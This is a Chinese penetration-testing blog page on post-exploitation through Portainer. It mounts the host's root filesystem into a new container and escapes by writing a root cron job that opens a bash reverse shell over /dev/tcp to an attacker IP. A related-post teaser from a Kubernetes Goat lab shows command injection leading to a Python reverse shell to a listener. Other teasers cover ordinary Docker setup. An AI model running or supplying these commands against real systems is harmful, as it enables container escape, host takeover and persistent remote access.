Portainer后渗透
发表于|更新于|渗透测试
|浏览量:
前言
1 | docker -H unix:///run/docker.sock run -v /:/test -it ubuntu:latest /bin/bash |
1 | Get "https://registry-1.docker.io/v2/": context deadline exceeded (Client.Timeout exceeded while awaiting headers) |
Portainer 的后渗透
更换镜像源
新建容器
逃逸
1 | echo '* * * * * bash -i >& /dev/tcp/ip/4000 0>&1' >> /test/var/spool/cron/root |
结束
文章作者: putdown
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Putdownd’s Blog!
相关推荐
2024-05-14
ARL(灯塔)删库后使用docker搭建ARL(灯塔)
docker 保存命令把镜像保存为本地文件 1234docker tag cd80881c4e0e rabbitmq:localdocker save tophant/arl -o arl.tardocker save mongo -o mongo.tardocker save rabbitmq -o rabbitmq.tar 修改docker-compose.yml的文件 主要修改: tophant/arl:${ARL_VERSION:-latest} 改为 image: tophant/arl:local 以此类推。 以下为修改后。 1docker load < rabbitmq.tar 创建文件 1docker volume create arl_db 启动 注意 数据不会保留 及时更改密码
2023-10-27
Kubernetes Goat 02 - docker in docker
Kubernetes Goat 02 - docker in docker 靶机ip:http://192.168.72.129:1231/ 能执行ping命令 职业习惯加个管道符 反弹shell 尝试使用bash来反弹没有成功 使用python反弹执行成功 监听 执行命令 1192.168.88.43 | python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.88.43",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' 判断环境 ls -la mount docker in docker “Docker in Docker” (DinD) 是一种在 Docker 容器内部运行 Docker 的实践方法。它允许您在一个容器中运行和管理 Docker 容器,而无需在宿主机上安装 Docker。 doc...
2025-08-19
镜像运行(vmdk在vmware运行)
衔接上文 上一篇文章是吧E01的镜像转换为了vmdk格式,并在虚拟机进行了挂载 今天是把镜像实在虚拟机里面完整跑起来 准备工作 vmdk格式的镜像文件 vmware虚拟机啊 开始 首先新建虚拟机,选择自定义 默认下一步 稍后安装 看恢复的系统,这次是windows就选择了windows 自定义名称路径 固件类型选在bios 按需配置cpu及内存 因为是镜像恢复就不联网了 控制器类型,默认 磁盘类型scsi 使用现有的虚拟机 选择要跑的vmdk文件 保持现有格式 完成 结束 最近有点老年痴呆,简单记录下过程
2023-10-28
Kubernetes Goat 05 - Docker CIS benchmarks analysis
Docker CIS benchmarks analysisDocker CIS 基线分析 首先需要部署docker bench security将它启动为DaemonSet 1cd kubernetes-goat/ 1kubectl apply -f scenarios/docker-bench-security/deployment.yaml 运行容器应用 1kubectl get pod 1kubectl exec -it docker-bench-security-6npjf -- sh 等待结果就好了 结束
2023-02-13
vulfocus搭建第二种方案-镜像下载问题
搭建问题 上一篇: https://putdown.top/archives/2454ee1f.html 镜像下载的时候没有反应;下载慢等情况. 官方搭建文档: https://fofapro.github.io/vulfocus/#/INSTALL?id=docker-compose-%e5%ae%89%e8%a3%85 第二种方案 搭建开始拉取 vulfocus 和安装项目依赖123在盘符新建文件夹 datacd /datagit clone https://github.com/fofapro/vulfocus.git web 配置环境参数12cd /data/webvim docker-compose.yaml 修改文件 下面还有一处, xxx.xxx.xxx.xxx ,忘记修改了,自行修改下 启动项目1docker-compose up 这时浏览器地址栏输入本机ip即可访问vulfocus服务 预览 镜像问题 靶场镜像下载1https://hub.docker.com/u/vulfocus 例子 1docker pull vu...
2024-01-17
docker-compose搭建NPS
docker-compose搭建NPS 新建文件夹 /opt/nps 在 /opt/nps文件夹下新建 docker-compose.yml 文件 文件内容: 12345678910version: "3"services: minio: privileged: true image: ffdfgdfg/nps:latest container_name: nps restart: always network_mode: "host" volumes: - /opt/nps/conf:/conf 下载配置文件 去 github下载配置文件, 1https://github.com/ehang-io/nps 整个 conf 文件夹 下载完这个文件夹包含这些文件 修改配置文件 修改 nps.conf 修改账号密码或者端口 nps 未授权和默认key修复方法 还是 nps.conf配置文件 取消掉 auth_key的注释,把后面的值改一下 启动1dock...